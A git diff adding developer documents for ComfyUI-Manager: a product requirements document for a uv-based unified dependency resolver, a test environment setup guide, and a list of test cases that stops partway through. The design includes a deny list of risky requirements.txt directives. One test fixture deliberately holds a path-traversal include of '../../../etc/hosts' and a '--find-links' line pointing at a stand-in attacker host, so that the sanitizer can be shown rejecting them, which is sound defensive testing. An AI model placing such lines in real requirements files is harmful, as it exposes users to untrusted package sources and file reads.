+++ b/docs/dev/PRD-unified-dependency-resolver.md
@@ -0,0 +1,357 @@
+# PRD: Unified Dependency Resolver
+
+## 1. Overview
+
+### 1.1 Background
+ComfyUI Manager currently installs each node pack's `requirements.txt` individually via `pip install`.
+This approach causes dependency conflicts where installing a new node pack can break previously installed node packs' dependencies.
+
+**Current flow:**
+```mermaid
+graph LR
+ A1[Install node pack A] --> A2[pip install A's deps] --> A3[Run install.py]
+ B1[Install node pack B] --> B2[pip install B's deps] --> B3[Run install.py]
+    B2 -.->|May break<br/>A's deps| A2
+```
+
+### 1.2 Goal
+Implement a unified dependency installation module that uses `uv` to resolve all dependencies (installed node packs + new node packs) at once.
+
+**New flow (unified resolver mode):**
+```mermaid
+graph TD
+ subgraph "Install Time (immediate)"
+ A1[User installs node pack X] --> A2[Git clone / download]
+ A2 --> A3["Run X's install.py (if exists)"]
+        A3 --> A4["Skip per-node pip install<br/>(deps deferred to restart)"]
+ end
+
+ subgraph "ComfyUI Restart (startup batch)"
+ B1[prestartup_script.py] --> B2[Collect ALL installed node packs' deps]
+ B2 --> B3["uv pip compile → pinned requirements.txt"]
+ B3 --> B4["uv pip install -r → Batch install"]
+ B4 --> B5[PIPFixer environment correction]
+ end
+```
+
+> **Terminology**: In this document, "lockfile" refers to the **pinned requirements.txt** generated by `uv pip compile`.
+> This is different from the `uv.lock` (TOML format) generated by `uv lock`. We use a pip-compatible workflow.
+
+### 1.3 Scope
+- Develop a new dedicated dependency resolution module
+- Opt-in activation from the existing install process
+- **Handles dependency resolution (deps install) only**. `install.py` execution is handled by existing logic
+
+---
+
+## 2. Constraints
+
+| Item | Description |
+|------|-------------|
+| **uv required** | Only operates in environments where `uv` is available |
+| **Independent of `use_uv` flag** | `use_unified_resolver` is separate from the existing `use_uv` flag. Even if `use_uv=False`, setting `use_unified_resolver=True` attempts resolver activation. Auto-fallback if uv is not installed |
+| **Pre-validated list** | Input node pack list is assumed to be pre-verified for mutual dependency compatibility |
+| **Backward compatibility** | Existing pip-based install process is fully preserved (fallback) |
+| **Blacklist/overrides bypassed** | In unified mode, `pip_blacklist`, `pip_overrides`, `pip_downgrade_blacklist` are NOT applied (empty values passed). Constructor interface is preserved for future extensibility. `uv pip compile` handles all conflict resolution natively. **[DEFERRED]** Reading actual values from `cm_global` at startup is deferred to a future version — v1 always passes empty values |
+| **Multiple custom_nodes paths** | Supports all paths returned by `folder_paths.get_folder_paths('custom_nodes')` |
+| **Scope of application** | Batch resolver runs at **module scope** in `prestartup_script.py` (unconditionally when enabled, independent of `install-scripts.txt` existence). The 2 `execute_install_script()` locations skip per-node pip install when unified mode is active (deps deferred to restart). `execute_lazy_install_script()` is also modified to skip per-node pip install in unified mode. Other install paths such as `install_manager_requirements()`, `pip_install()` are outside v1 scope (future extension) |
+| **Legacy module** | `comfyui_manager/legacy/manager_core.py` is excluded from modification. Legacy paths retain existing pip behavior |
+
+---
+
+## 3. Functional Requirements
+
+### FR-1: Node Pack List and Base Dependency Input
+
+**Input:**
+- Node pack list (fullpath list of installed + to-be-installed node packs)
+- Base dependencies (ComfyUI's `requirements.txt` and `manager_requirements.txt`)
+
+**Behavior:**
+- Validate each node pack path
+- Exclude disabled (`.disabled`) node packs
+ - Detection criteria: Existence of `custom_nodes/.disabled/{node_pack_name}` **directory**
+ - Existing mechanism: Disabling a node pack **moves** it from `custom_nodes/` to `custom_nodes/.disabled/` (does NOT create a `.disabled` file inside the node pack)
+ - At resolver input time, disabled node packs should already be absent from `custom_nodes/`, so normally they won't be in `node_pack_paths`
+ - Defensively exclude any node pack paths that are within the `.disabled` directory
+- Base dependencies are treated as constraints
+- Traverse all paths from `folder_paths.get_folder_paths('custom_nodes')`
+
+**`cm_global` runtime dependencies:**
+- `cm_global.pip_overrides`, `pip_blacklist`, `pip_downgrade_blacklist` are dynamically assigned during `prestartup_script.py` execution
+- In unified mode, these are **not applied** — empty values are passed to the resolver constructor
+- The constructor interface accepts these parameters for future extensibility (defaults to empty when `None`)
+
+### FR-2: Dependency List Extraction
+
+**Behavior:**
+- Parse `requirements.txt` from each node pack directory
+ - Encoding: Use `robust_readlines()` pattern (`chardet` detection, assumes UTF-8 if not installed)
+- Package name remapping (constructor accepts `overrides` dict — **empty in v1**, interface preserved for extensibility)
+- Blacklist package filtering (constructor accepts `blacklist` set — **empty in v1**, uv handles torch etc. natively)
+- Downgrade blacklist filtering (constructor accepts `downgrade_blacklist` list — **empty in v1**)
+- **Note**: In unified mode, `uv pip compile` resolves all version conflicts natively. The blacklist/overrides/downgrade_blacklist mechanisms from the existing pip flow are bypassed
+- Strip comments (`#`) and blank lines
+- **Input sanitization** (see below)
+- Separate handling of `--index-url` entries (see below)
+
+**Input sanitization:**
+- Requirements lines matching the following patterns are **rejected and logged** (security defense):
+ - `-r`, `--requirement` (recursive include → path traversal risk)
+ - `-e`, `--editable` (VCS/local path install → arbitrary code execution risk)
+ - `-c`, `--constraint` (external constraint file injection)
+ - `--find-links`, `-f` (external package source specification)
+ - `@ file://` (local file reference → path traversal risk)
+ - Package names containing path separators (`/`, `\`)
+- Allowed items: Package specs (`name>=version`), specs with `--index-url`, environment markers (containing `;`)
+- Rejected lines are recorded in the `skipped` list with reason
+
+**`--index-url` handling:**
+- Existing code (standalone function `execute_install_script()`) parses `package_name --index-url URL` format for special handling
+- **Note**: The class method `UnifiedManager.execute_install_script()` does NOT have this handling (asymmetric)
+- The unified resolver **unifies both paths** for consistent handling:
+ - Package spec → added to the general dependency list
+ - `--extra-index-url URL` → passed as `uv pip compile` argument
+- Separated index URLs are collected in `CollectedDeps.extra_index_urls`
+- **Credential redaction**: Authentication info (`user:pass@`) in index URLs is masked during logging
+
+**Duplicate handling strategy:**
+- No deduplication is performed directly
+- Different version specs of the same package are **all passed as-is** to uv
+- `uv pip compile` handles version resolution (uv determines the optimal version)
+
+**Output:**
+- Unified dependency list (tracked by source node pack)
+- Additional index URL list
+
+### FR-3: uv pip compile Execution
+
+**Behavior:**
+- Generate temporary requirements file from the collected dependency list
+- Execute `uv pip compile` to produce a pinned requirements.txt
+ - `--output-file` (required): Specify output file (outputs to stdout only if not specified)
+ - `--constraint`: Pass base dependencies as constraints
+ - `--python`: Current Python interpreter path
+ - `--extra-index-url`: Additional index URLs collected from FR-2 (multiple allowed)
+- Resolve for the current platform (platform-specific results)
+
+**Error handling:**
+- Return conflict package report when resolution fails
+- Timeout handling (300s): Explicitly catch `subprocess.TimeoutExpired`, terminate child process, then fallback
+- Lockfile output file existence verification: Confirm file was actually created even when `returncode == 0`
+- Temp file cleanup: Guaranteed in `finally` block. Includes stale temp file cleanup logic at next execution for abnormal termination (SIGKILL) scenarios
+
+**Output:**
+- pinned requirements.txt (file with all packages pinned to exact versions)
+
+### FR-4: Pinned Requirements-based Dependency Installation
+
+**Behavior:**
+- Execute `uv pip install -r <pinned-requirements.txt>`
+ - **Do NOT use `uv pip sync`**: sync deletes packages not in the lockfile, risking removal of torch, ComfyUI's own dependencies, etc.
+- Already-installed packages at the same version are skipped (default uv behavior)
+- Log installation results
+
+**Error handling:**
+- `uv pip install -r` is an **atomic operation** (all-or-nothing)
+- On total failure: Parse stderr for failure cause report → fallback to existing pip
+- **No partial failure report** (not possible due to uv's behavior)
+- `InstallResult`'s `installed`/`skipped` fields are populated by parsing uv stdout; `stderr` records failure cause (no separate `failed` field needed due to atomic model)
+
+### FR-5: Post-install Environment Correction
+
+**Behavior:**
+- Call `PIPFixer.fix_broken()` for environment integrity correction
+ - Restore torch version (when change detected)
+ - Fix OpenCV conflicts
+ - Restore comfyui-frontend-package
+ - Restore packages based on `pip_auto_fix.list`
+- **This step is already performed in the existing `execute_install_script()` flow, so the unified resolver itself doesn't need to call it**
+ - However, an optional call option is provided for cases where the resolver is invoked independently outside the existing flow
+
+### FR-6: install.py Execution (Existing Flow Maintained)
+
+**Behavior:**
+- The unified resolver handles deps installation **at startup time only**
+- `install.py` execution is handled by the existing `execute_install_script()` flow and runs **immediately** at install time
+- Deps are deferred to startup batch resolution; `install.py` runs without waiting for deps
+
+**Control flow specification (unified mode active):**
+- `execute_install_script()`: **skip** the `requirements.txt`-based individual pip install loop entirely (deps will be resolved at next restart)
+- `install.py` execution runs **immediately** as before
+- At next ComfyUI restart: `prestartup_script.py` runs the unified resolver for all installed node packs
+
+**Control flow specification (unified mode inactive / fallback):**
+- Existing pip install loop runs as-is (no change)
+- `install.py` execution runs **immediately** as before
+
+### FR-7: Startup Batch Resolution
+
+**Behavior:**
+- When `use_unified_resolver=True`, **all dependency resolution is deferred to ComfyUI startup**
+- At install time: node pack itself is installed (git clone, etc.) and `install.py` runs immediately, but `requirements.txt` deps are **not** installed per-request
+- At startup time: `prestartup_script.py` runs the unified resolver once for all installed node packs
+
+**Startup execution flow (in `prestartup_script.py`):**
+1. At **module scope** (before `execute_startup_script()` gate): check `manager_util.use_unified_resolver` flag
+2. If enabled: collect all installed node pack paths, read base requirements from `comfy_path`
+3. Create `UnifiedDepResolver` with empty blacklist/overrides/downgrade_blacklist (uv handles resolution natively)
+4. Call `resolve_and_install()` — collects all deps → compile → install in one batch
+5. On success: set `_unified_resolver_succeeded = True`, skip per-node pip in `execute_lazy_install_script()`
+6. On failure: log warning, `execute_lazy_install_script()` falls back to existing per-node pip install
+7. **Note**: Runs unconditionally when enabled, independent of `install-scripts.txt` existence
+
+**`execute_install_script()` behavior in unified mode:**
+- Skip the `requirements.txt` pip install loop entirely (deps will be handled at restart)
+- `install.py` execution still runs immediately
+
+**`execute_lazy_install_script()` behavior in unified mode:**
+- Skip the `requirements.txt` pip install loop (already handled by startup batch resolver)
+- `install.py` execution still runs
+
+**Windows-specific behavior:**
+- Windows lazy install path also benefits from startup batch resolution
+- `try_install_script()` defers to `reserve_script()` as before for non-`instant_execution=True` installs
+
+---
+
+## 4. Non-functional Requirements
+
+| Item | Requirement |
+|------|-------------|
+| **Performance** | Equal to or faster than existing individual installs |
+| **Stability** | Must not break the existing environment |
+| **Logging** | Log progress and results at each step (details below) |
+| **Error recovery** | Fallback to existing pip method on failure |
+| **Testing** | Unit test coverage above 80% |
+| **Security** | requirements.txt input sanitization (see FR-2), credential log redaction, subprocess list-form invocation |
+| **Concurrency** | Prevent lockfile path collisions on concurrent install requests. Use process/thread-unique suffixes or temp directories |
+| **Temp files** | Guarantee temp file cleanup on both normal and abnormal termination. Clean stale files on next execution |
+
+### Logging Requirements
+
+| Step | Log Level | Content |
+|------|-----------|---------|
+| Resolver start | `INFO` | Node pack count, total dependency count, mode (unified/pip) |
+| Dependency collection | `INFO` | Collection summary (collected N, skipped N, sources N) |
+| Dependency collection | `DEBUG` | Per-package collection/skip/remap details |
+| `--index-url` detection | `INFO` | Detected additional index URL list |
+| uv compile start | `INFO` | Execution command (excluding sensitive info) |
+| uv compile success | `INFO` | Pinned package count, elapsed time |
+| uv compile failure | `WARNING` | Conflict details, fallback transition notice |
+| Install start | `INFO` | Number of packages to install |
+| Install success | `INFO` | Installed/skipped/failed count summary, elapsed time |
+| Install failure | `WARNING` | Failed package list, fallback transition notice |
+| Fallback transition | `WARNING` | Transition reason, original error message |
+| Overall completion | `INFO` | Final result summary (success/fallback/failure) |
+
+> **Log prefix**: All logs use `[UnifiedDepResolver]` prefix to distinguish from existing pip install logs
+
+---
+
+## 5. Usage Scenarios
+
+### Scenario 1: Single Node Pack Installation (unified mode)
+```
+User requests installation of node pack X
+→ Git clone / download node pack X
+→ Run X's install.py (if exists) — immediately
+→ Skip per-node pip install (deps deferred)
+→ User restarts ComfyUI
+→ prestartup_script.py: Collect deps from ALL installed node packs (A,B,C,X)
+→ uv pip compile resolves fully compatible versions
+→ uv pip install -r for batch installation
+→ PIPFixer environment correction
+```
+
+### Scenario 2: Multi Node Pack Batch Installation (unified mode)
+```
+User requests installation of node packs X, Y, Z
+→ Each node pack: git clone + install.py — immediately
+→ Per-node pip install skipped for all
+→ User restarts ComfyUI
+→ prestartup_script.py: Collect deps from ALL installed node packs (including X,Y,Z)
+→ Single uv pip compile → single uv pip install -r
+→ PIPFixer environment correction
+```
+
+### Scenario 3: Dependency Resolution Failure (Edge Case)
+```
+Even pre-validated lists may fail due to uv version differences or platform issues
+→ uv pip compile failure → return conflict report
+→ Display conflict details to user
+→ Auto-execute existing pip fallback
+```
+
+### Scenario 4: uv Not Installed
+```
+uv unavailable detected → auto-fallback to existing pip method
+→ Display uv installation recommendation to user
+```
+
+### Scenario 5: Windows Lazy Installation (unified mode)
+```
+Node pack installation requested on Windows
+→ Node pack install deferred to startup (existing lazy mechanism)
+→ On next ComfyUI startup: unified resolver runs first (batch deps)
+→ execute_lazy_install_script() skips per-node pip (already resolved)
+→ install.py still runs per node pack
+```
+
+### Scenario 6: Malicious/Non-standard requirements.txt
+```
+Node pack's requirements.txt contains `-r ../../../etc/hosts` or `-e git+https://...`
+→ Sanitization filter rejects the line
+→ Log rejection reason and continue processing remaining valid packages
+→ Notify user of rejected item count
+```
+
+### Scenario 7: Concurrent Install Requests (unified mode)
+```
+User requests installation of node packs A and B nearly simultaneously from UI
+→ Each request: git clone + install.py immediately, deps skipped
+→ On restart: single unified resolver run handles both A and B deps together
+→ No concurrency issue (single batch at startup)
+```
+
+---
+
+## 6. Success Metrics
+
+| Metric | Target |
+|--------|--------|
+| Dependency conflict reduction | 90%+ reduction compared to current |
+| Install success rate | 99%+ (for compatibility-verified lists) |
+| Performance | Equal to or better than existing individual installs |
+| Adoption rate | 50%+ of eligible users |
+
+---
+
+## 7. Future Extensions
+
+- ~~**`cm_global` integration** [DONE]: `cm_cli uv-compile` and `cm_cli install --uv-compile` pass real `cm_global` values. Startup path (`prestartup_script.py`) still passes empty by design~~
+- Lockfile caching: Reuse for identical node pack configurations
+- Pre-install dependency conflict validation API: Check compatibility before installation
+- Dependency tree visualization: Display dependency relationships to users
+- `uv lock`-based cross-platform lockfile support (TOML format)
+- `install_manager_requirements()` integration: Resolve manager's own dependencies through unified resolver
+- `pip_install()` integration: Route UI direct installs through unified resolver
+- Legacy module (`comfyui_manager/legacy/`) unified resolver support
+
+---
+
+## Appendix A: Existing Code Install Path Mapping
+
+> This section is reference material to clarify the unified resolver's scope of application.
+
+| Install Path | Location | v1 Applied | Notes |
+|-------------|----------|------------|-------|
+| `UnifiedManager.execute_install_script()` | `glob/manager_core.py` (method) | ✅ Yes | Skips per-node pip in unified mode (deps deferred to restart) |
+| Standalone `execute_install_script()` | `glob/manager_core.py` (function) | ✅ Yes | Skips per-node pip in unified mode (deps deferred to restart) |
+| `execute_lazy_install_script()` | `prestartup_script.py` | ✅ Yes | Skips per-node pip in unified mode (already batch-resolved) |
+| Startup batch resolver | `prestartup_script.py` | ✅ Yes | **New**: Runs unified resolver once at startup for all node packs |
+| `install_manager_requirements()` | `glob/manager_core.py` | ❌ No | Manager's own deps |
+| `pip_install()` | `glob/manager_core.py` | ❌ No | UI direct install |
+| Legacy `execute_install_script()` (2 locations) | `legacy/manager_core.py` | ❌ No | Legacy paths |
+| `cm_cli uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Standalone CLI batch resolution (with `cm_global` values) |
+| `cm_cli install --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped, batch resolution after all installs |
diff --git a/docs/dev/TEST-environment-setup.md b/docs/dev/TEST-environment-setup.md
new file mode 100644
index 00000000..56dc364d
--- /dev/null
+++ b/docs/dev/TEST-environment-setup.md
@@ -0,0 +1,194 @@
+# Test Environment Setup
+
+Procedures for setting up a ComfyUI environment with ComfyUI-Manager installed for functional testing.
+
+## Automated Setup (Recommended)
+
+Three shell scripts in `tests/e2e/scripts/` automate the entire lifecycle:
+
+```bash
+# 1. Setup: clone ComfyUI, create venv, install deps, symlink Manager
+E2E_ROOT=/tmp/e2e_test MANAGER_ROOT=/path/to/comfyui-manager-draft4 \
+ bash tests/e2e/scripts/setup_e2e_env.sh
+
+# 2. Start: launches ComfyUI in background, blocks until ready
+E2E_ROOT=/tmp/e2e_test bash tests/e2e/scripts/start_comfyui.sh
+
+# 3. Stop: graceful SIGTERM → SIGKILL shutdown
+E2E_ROOT=/tmp/e2e_test bash tests/e2e/scripts/stop_comfyui.sh
+
+# 4. Cleanup
+rm -rf /tmp/e2e_test
+```
+
+### Script Details
+
+| Script | Purpose | Input | Output |
+|--------|---------|-------|--------|
+| `setup_e2e_env.sh` | Full environment setup (8 steps) | `E2E_ROOT`, `MANAGER_ROOT`, `COMFYUI_BRANCH` (default: master), `PYTHON` (default: python3) | `E2E_ROOT=` on last line |
+| `start_comfyui.sh` | Foreground-blocking launcher | `E2E_ROOT`, `PORT` (default: 8199), `TIMEOUT` (default: 120s) | `COMFYUI_PID= PORT=` |
+| `stop_comfyui.sh` | Graceful shutdown | `E2E_ROOT`, `PORT` (default: 8199) | — |
+
+**Idempotent**: `setup_e2e_env.sh` checks for a `.e2e_setup_complete` marker file and skips setup if the environment already exists.
+
+**Blocking mechanism**: `start_comfyui.sh` uses `tail -n +1 -f | grep -q -m1 'To see the GUI'` to block until ComfyUI is ready. No polling loop needed.
+
+---
+
+## Prerequisites
+
+- Python 3.9+
+- Git
+- `uv` (install via `pip install uv` or [standalone](https://docs.astral.sh/uv/getting-started/installation/))
+
+## Manual Setup (Reference)
+
+For understanding or debugging, the manual steps are documented below. The automated scripts execute these same steps.
+
+### 1. ComfyUI Clone
+
+```bash
+COMFY_ROOT=$(mktemp -d)/ComfyUI
+git clone https://github.com/comfyanonymous/ComfyUI.git "$COMFY_ROOT"
+cd "$COMFY_ROOT"
+```
+
+### 2. Virtual Environment
+
+```bash
+cd "$COMFY_ROOT"
+uv venv .venv
+source .venv/bin/activate # Linux/macOS
+# .venv\Scripts\activate # Windows
+```
+
+### 3. ComfyUI Dependencies
+
+```bash
+# GPU (CUDA)
+uv pip install -r requirements.txt --extra-index-url https://download.pytorch.org/whl/cu121
+
+# CPU only (lightweight, for functional testing)
+uv pip install -r requirements.txt --extra-index-url https://download.pytorch.org/whl/cpu
+```
+
+### 4. ComfyUI-Manager Install (Development)
+
+```bash
+# MANAGER_ROOT = comfyui-manager-draft4 repository root
+MANAGER_ROOT=/path/to/comfyui-manager-draft4
+
+# Editable install from current source
+uv pip install -e "$MANAGER_ROOT"
+```
+
+> **Note**: Editable mode (`-e`) reflects code changes without reinstalling.
+> For production-like testing, use `uv pip install "$MANAGER_ROOT"` (non-editable).
+
+### 5. Symlink Manager into custom_nodes
+
+```bash
+ln -s "$MANAGER_ROOT" "$COMFY_ROOT/custom_nodes/ComfyUI-Manager"
+```
+
+### 6. Write config.ini
+
+```bash
+mkdir -p "$COMFY_ROOT/user/__manager"
+cat > "$COMFY_ROOT/user/__manager/config.ini" << 'EOF'
+[default]
+use_uv = true
+use_unified_resolver = true
+EOF
+```
+
+> **IMPORTANT**: The config path is `$COMFY_ROOT/user/__manager/config.ini`, resolved by `folder_paths.get_system_user_directory("manager")`. It is NOT inside the symlinked Manager directory.
+
+### 7. HOME Isolation
+
+```bash
+export HOME=/tmp/e2e_home
+mkdir -p "$HOME/.config" "$HOME/.local/share"
+```
+
+### 8. ComfyUI Launch
+
+```bash
+cd "$COMFY_ROOT"
+PYTHONUNBUFFERED=1 python main.py --enable-manager --cpu --port 8199
+```
+
+| Flag | Purpose |
+|------|---------|
+| `--enable-manager` | Enable ComfyUI-Manager (disabled by default) |
+| `--cpu` | Run without GPU (for functional testing) |
+| `--port 8199` | Use non-default port to avoid conflicts |
+| `--enable-manager-legacy-ui` | Enable legacy UI (optional) |
+| `--listen` | Allow remote connections (optional) |
+
+### Key Directories
+
+| Directory | Path | Description |
+|-----------|------|-------------|
+| ComfyUI root | `$COMFY_ROOT/` | ComfyUI installation root |
+| Manager data | `$COMFY_ROOT/user/__manager/` | Manager config, startup scripts, snapshots |
+| Config file | `$COMFY_ROOT/user/__manager/config.ini` | Manager settings (`use_uv`, `use_unified_resolver`, etc.) |
+| custom_nodes | `$COMFY_ROOT/custom_nodes/` | Installed node packs |
+
+> The Manager data path is resolved via `folder_paths.get_system_user_directory("manager")`.
+> Printed at startup: `** ComfyUI-Manager config path: <manager data dir>/config.ini`
+
+### Startup Sequence
+
+When Manager loads successfully, the following log lines appear:
+
+```
+[PRE] ComfyUI-Manager # prestartup_script.py executed
+[START] ComfyUI-Manager # manager_server.py loaded
+```
+
+The `Blocked by policy` message for Manager in custom_nodes is **expected** — `should_be_disabled()` in `comfyui_manager/__init__.py` prevents legacy double-loading when Manager is already pip-installed.
+
+---
+
+## Caveats & Known Issues
+
+### PYTHONPATH for `comfy` imports
+
+ComfyUI's `comfy` package is a **local package** inside the ComfyUI directory — it is NOT pip-installed. Any code that imports from `comfy` (including `comfyui_manager.__init__`) requires `PYTHONPATH` to include the ComfyUI directory:
+
+```bash
+PYTHONPATH="$COMFY_ROOT" python -c "import comfy"
+PYTHONPATH="$COMFY_ROOT" python -c "import comfyui_manager"
+```
+
+The automated scripts handle this via `PYTHONPATH` in verification checks and the ComfyUI process inherits it implicitly by running from the ComfyUI directory.
+
+### config.ini path
+
+The config file must be at `$COMFY_ROOT/user/__manager/config.ini`, **NOT** inside the Manager symlink directory. This is resolved by `folder_paths.get_system_user_directory("manager")` at `prestartup_script.py:65-73`.
+
+### Manager v4 endpoint prefix
+
+All Manager endpoints use the `/v2/` prefix (e.g., `/v2/manager/queue/status`, `/v2/snapshot/get_current`). Paths without the prefix will return 404.
+
+### `Blocked by policy` is expected
+
+When Manager detects that it's loaded as a custom_node but is already pip-installed, it prints `Blocked by policy` and skips legacy loading. This is intentional behavior in `comfyui_manager/__init__.py:39-51`.
+
+### Bash `((var++))` trap
+
+Under `set -e`, when `var` is 0, `((var++))` evaluates to the pre-increment value (0), and an arithmetic expression evaluating to 0 returns exit code 1, killing the script. Use `var=$((var + 1))` instead.
+
+### `git+https://` URLs in requirements.txt
+
+Some node packs (e.g., Impact Pack's SAM2 dependency) use `git+https://github.com/...` URLs. The unified resolver correctly rejects these with "rejected path separator" — they must be installed separately.
+
+---
+
+## Cleanup
+
+```bash
+deactivate
+rm -rf "$COMFY_ROOT"
+```
diff --git a/docs/dev/TEST-unified-dep-resolver.md b/docs/dev/TEST-unified-dep-resolver.md
new file mode 100644
index 00000000..eb90a1de
--- /dev/null
+++ b/docs/dev/TEST-unified-dep-resolver.md
@@ -0,0 +1,788 @@
+# Test Cases: Unified Dependency Resolver
+
+See [TEST-environment-setup.md](TEST-environment-setup.md) for environment setup.
+
+## Enabling the Resolver
+
+Add the following to `config.ini` (in the Manager data directory):
+
+```ini
+[default]
+use_unified_resolver = true
+```
+
+> Config path: `$COMFY_ROOT/user/__manager/config.ini`
+> Also printed at startup: `** ComfyUI-Manager config path: <manager-data-dir>/config.ini` (the directory portion is the resolved Manager data directory)
+
+**Log visibility note**: `[UnifiedDepResolver]` messages are emitted via Python's `logging` module (INFO and WARNING levels), not `print()`. Ensure the logging level is set to INFO or lower. ComfyUI defaults typically show these, but if messages are missing, check that the root logger or the `ComfyUI-Manager` logger is not set above INFO.
+
+## API Reference (for Runtime Tests)
+
+Node pack installation at runtime uses the task queue API:
+
+```
+POST http://localhost:8199/v2/manager/queue/task
+Content-Type: application/json
+```
+
+> **Port**: E2E tests use port 8199 to avoid conflicts with running ComfyUI instances. Replace with your actual port if different.
+
+**Payload** (`QueueTaskItem`):
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `ui_id` | string | Unique task identifier (any string) |
+| `client_id` | string | Client identifier (any string) |
+| `kind` | `OperationType` enum | `"install"`, `"uninstall"`, `"update"`, `"update-comfyui"`, `"fix"`, `"disable"`, `"enable"`, `"install-model"` |
+| `params` | object | Operation-specific parameters (see below) |
+
+**Install params** (`InstallPackParams`):
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `id` | string | CNR node pack ID (e.g., `"comfyui-impact-pack"`) or `"author/repo"` |
+| `version` | string | Required by the request schema; set it to the same value as `selected_version`. |
+| `selected_version` | string | **Controls install target**: `"latest"`, `"nightly"`, or specific semver |
+| `mode` | string | `"remote"`, `"local"`, or `"cache"` |
+| `channel` | string | `"default"`, `"recent"`, `"legacy"`, etc. |
+
+> **Note**: `cm_cli` supports unified resolver via `cm_cli uv-compile` (standalone) and
+> `cm_cli install --uv-compile` (install-time batch resolution). Without `--uv-compile`,
+> installs use per-node pip via `legacy/manager_core.py`.
+
+---
+
+## Out of Scope (Deferred)
+
+The following are intentionally **not tested** in this version:
+
+- **cm_global integration (startup path only)**: At startup (`prestartup_script.py`), `pip_blacklist`, `pip_overrides`, `pip_downgrade_blacklist` are passed as empty defaults to the resolver. Integration with cm_global at startup is deferred to a future commit. Do not file defects for blacklist/override/downgrade behavior in startup unified mode. Note: `cm_cli uv-compile` and `cm_cli install --uv-compile` already pass real `cm_global` values (see PRD Future Extensions).
+- **cm_cli per-node install (without --uv-compile)**: `cm_cli install` without `--uv-compile` imports from `legacy/manager_core.py` and uses per-node pip install. This is by design — use `cm_cli install --uv-compile` or `cm_cli uv-compile` for batch resolution.
+- **Standalone `execute_install_script()`** (`glob/manager_core.py` ~line 1881): Has a unified resolver guard (`manager_util.use_unified_resolver`), identical to the class method guard. Reachable from the glob API via `update-comfyui` tasks (`update_path()` / `update_to_stable_comfyui()`), git-based node pack updates (`git_repo_update_check_with()` / `fetch_or_pull_git_repo()`), and gitclone operations. Also called from CLI and legacy server paths. The guard behaves identically to the class method at all call sites; testing it separately adds no coverage beyond TC-14 Path 1.
+
+## CLI E2E Tests (`cm_cli uv-compile`)
+
+These tests do **not** require ComfyUI server. Only a venv with `COMFYUI_PATH` set and
+the E2E environment from `setup_e2e_env.sh` are needed.
+
+**Common setup**:
+```bash
+source tests/e2e/scripts/setup_e2e_env.sh # → E2E_ROOT=...
+export COMFYUI_PATH="$E2E_ROOT/comfyui"
+VENV_PY="$E2E_ROOT/venv/bin/python"
+```
+
+---
+
+### TC-CLI-1: Normal Batch Resolution [P0]
+
+**Steps**:
+1. Create a test node pack with a simple dependency:
+```bash
+mkdir -p "$COMFYUI_PATH/custom_nodes/test_cli_pack"
+echo "chardet>=5.0" > "$COMFYUI_PATH/custom_nodes/test_cli_pack/requirements.txt"
+```
+2. Run:
+```bash
+$VENV_PY -m cm_cli uv-compile
+```
+
+**Verify**:
+- Exit code: 0
+- Output contains: `Resolved N deps from M source(s)`
+- `chardet` is importable: `$VENV_PY -c "import chardet"`
+
+**Cleanup**: `rm -rf "$COMFYUI_PATH/custom_nodes/test_cli_pack"`
+
+---
+
+### TC-CLI-2: No Custom Node Packs [P1]
+
+**Steps**:
+1. Ensure `custom_nodes/` contains no node packs (only symlinks like `ComfyUI-Manager`
+ or empty dirs may remain)
+2. Run:
+```bash
+$VENV_PY -m cm_cli uv-compile
+```
+
+**Verify**:
+- Exit code: 0
+- Output contains: `No custom node packs found` OR `Resolution complete (no deps needed)`
+
+---
+
+### TC-CLI-3: uv Unavailable [P0]
+
+**Steps**:
+1. Create a temporary venv **without** uv:
+```bash
+python3 -m venv /tmp/no_uv_venv
+/tmp/no_uv_venv/bin/pip install comfyui-manager # or install from local
+```
+2. Ensure no standalone `uv` in PATH:
+```bash
+PATH="/tmp/no_uv_venv/bin" COMFYUI_PATH="$COMFYUI_PATH" \
+ /tmp/no_uv_venv/bin/python -m cm_cli uv-compile
+```
+
+**Verify**:
+- Exit code: 1
+- Output contains: `uv is not available`
+
+**Cleanup**: `rm -rf /tmp/no_uv_venv`
+
+---
+
+### TC-CLI-4: Conflicting Dependencies [P0]
+
+**Steps**:
+1. Create two node packs with conflicting pinned versions:
+```bash
+mkdir -p "$COMFYUI_PATH/custom_nodes/conflict_a"
+echo "numpy==1.24.0" > "$COMFYUI_PATH/custom_nodes/conflict_a/requirements.txt"
+mkdir -p "$COMFYUI_PATH/custom_nodes/conflict_b"
+echo "numpy==1.26.0" > "$COMFYUI_PATH/custom_nodes/conflict_b/requirements.txt"
+```
+2. Run:
+```bash
+$VENV_PY -m cm_cli uv-compile
+```
+
+**Verify**:
+- Exit code: 1
+- Output contains: `Resolution failed`
+
+**Cleanup**: `rm -rf "$COMFYUI_PATH/custom_nodes/conflict_a" "$COMFYUI_PATH/custom_nodes/conflict_b"`
+
+---
+
+### TC-CLI-5: Dangerous Pattern Skip [P0]
+
+**Steps**:
+1. Create a node pack mixing valid and dangerous lines:
+```bash
+mkdir -p "$COMFYUI_PATH/custom_nodes/test_dangerous"
+cat > "$COMFYUI_PATH/custom_nodes/test_dangerous/requirements.txt" << 'EOF'
+chardet>=5.0
+-r ../../../etc/hosts
+--find-links http://evil.com/pkgs
+requests>=2.28
+EOF
+```
+2. Run:
+```bash
+$VENV_PY -m cm_cli uv-compile
+```
+
+**Verify**:
+- Exit code: 0
+- Output contains: `Resolved 2 deps` (chardet + requests, dangerous lines skipped)
+- `chardet` and `requests` are importable
+- Log contains: `rejected dangerous line` for the `-r` and `--find-links` lines
+
+**Cleanup**: `rm -rf "$COMFYUI_PATH/custom_nodes/test_dangerous"`
+
+---
+
+### TC-CLI-6: install --uv-compile Single Pack [P0]
+
+**Steps**:
+1. In clean E2E environment, install a single node pack:
+```bash
+$VENV_PY -m cm_cli install comfyui-impact-pack --uv-compile --mode remote
+```
+
+**Verify**:
+- Exit code: 0
+- Per-node pip install does NOT run (no `Install: pip packages` in output)
+- `install.py` still executes
+- Output contains: `Resolved N deps from M source(s)`
+- Impact Pack dependencies are importable: `cv2`, `skimage`, `dill`, `scipy`, `matplotlib`
+
+---
+
+### TC-CLI-7: install --uv-compile Multiple Packs [P0]
+
+**Steps**:
+1. After TC-CLI-6 (or with impact-pack already installed), install two more packs at once:
+```bash
+$VENV_PY -m cm_cli install comfyui-impact-subpack comfyui-inspire-pack --uv-compile --mode remote
+```
+
+**Verify**:
